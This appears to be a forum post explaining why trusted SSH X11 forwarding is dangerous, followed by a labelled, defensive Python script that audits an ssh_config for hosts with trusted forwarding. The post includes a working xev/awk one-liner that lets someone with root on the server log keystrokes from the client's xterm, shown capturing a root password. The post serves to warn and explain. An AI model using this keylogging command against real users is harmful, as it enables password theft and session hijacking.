I thought it was the opposite:
Quote:
-X Enables X11 forwarding. This can also be specified on a per-host basis in a configuration file.
X11 forwarding should be enabled with caution. Users with the ability to bypass file permissions on the
remote host (for the user's X authorization database) can access the local X11 display through the
forwarded connection. An attacker may then be able to perform activities such as keystroke monitoring.
I'm not sure how to enable untrusted but the problem with trusted is this:
Alice sitting on Client connects to Server.
Unfortunately, Bob has rooted Server. He has full access to files (like ~alice/.Xauthority)
Alice opens an xterm on Client.
Bob sets his display to the same that was given by Alice and through the tunnel, attaches to her display on Client:
DISPLAY=localhost:10.0 xev -id <xterm_window_id> | awk '/XLookupString gives 1 bytes/{ print $6}' | uniq
Alice on the client:
su -
s3cr3t
Bob on the server:
"s"
"3"
"c"
"r"
"3"
"t"
Bob now has the root password of the client... EOG
With sudo, Alice wouldn't have typed her password.
Unfortunately, Bob can also trivially inject commands in the xterm.
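
Added example, not part of the original post: a small audit that resolves which hosts in an OpenSSH client configuration end up with trusted X11 forwarding, the mode the scenario above depends on. It uses the real `ForwardX11` and `ForwardX11Trusted` options of ssh_config; the sample configuration and host names are constructed, `Match` blocks are skipped, and the default for `ForwardX11Trusted` is assumed to be the upstream `no`.

```python
import fnmatch
import re
# Constructed sample client config (not from the original post).
SAMPLE = """\
Host build-*
    ForwardX11 yes
    ForwardX11Trusted yes
Host lab
    ForwardX11=yes
Host *
    ForwardX11 no
    ForwardX11Trusted no
"""

def host_matches(patterns, hostname):
    """Host line semantics: a positive pattern must match and no negated one may."""
    positive = False
    for p in patterns:
        if p.startswith("!"):
            if fnmatch.fnmatchcase(hostname, p[1:]):
                return False
        elif fnmatch.fnmatchcase(hostname, p):
            positive = True
    return positive

def effective_x11(config_text, hostname, default_trusted="no"):
    """Return (ForwardX11, ForwardX11Trusted) for hostname; the first value found wins."""
    found = {}
    active = True  # options before the first Host line apply to every host
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        key, value = parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")
        if key == "host":
            active = host_matches(value.split(), hostname)
        elif key == "match":
            active = False  # assumption: Match blocks are not evaluated here
        elif active and key in ("forwardx11", "forwardx11trusted"):
            found.setdefault(key, value.lower())
    return found.get("forwardx11", "no"), found.get("forwardx11trusted", default_trusted)

def audit(config_text, hostnames):
    """Classify each host as 'off', 'untrusted' or 'trusted' X11 forwarding."""
    result = {}
    for h in hostnames:
        fwd, trusted = effective_x11(config_text, h)
        result[h] = "off" if fwd != "yes" else ("trusted" if trusted == "yes" else "untrusted")
    return result
```

Calling `audit(SAMPLE, ["build-01", "lab", "db1"])` reports only `build-01` as trusted; hosts in that class are the ones to review first.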